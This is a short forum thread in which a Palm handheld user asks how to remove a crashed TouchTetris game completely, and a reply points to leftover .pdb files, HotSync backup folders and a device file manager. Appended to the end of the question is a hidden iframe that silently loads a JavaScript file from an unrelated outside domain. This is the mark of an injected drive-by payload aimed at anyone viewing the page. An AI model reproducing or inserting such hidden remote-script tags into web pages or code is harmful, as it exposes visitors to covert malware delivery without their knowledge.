+ Reply to Thread

Help with deleting a crashed app

My favorite game app, TouchTetris, has finally seized up on me. Other apps work fine, but TT just stares at me when I call it up. I've tried deleting it and reinstalling it, but apparantly I'm not deleting it completely. It seems to still remember its high scores. I'm lost as to how I can get the device to completely forget everything about TouchTetris so I can bring it back in fresh. Any suggestions?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

If it still remembers you high scores it must have a .pdb file on the device still or it could be sychronizing it from your user folder on you computer.

Look on your computer in the Palm directory, then look for a folder that has the first 6 characters of your hotsync username. In this folder you will find more folders, but look in the install and back up folder and delete an files relating to your game.

If you are using the Kyocera 7135 - go to the "FileManager" and look for file relating to this game and delete them.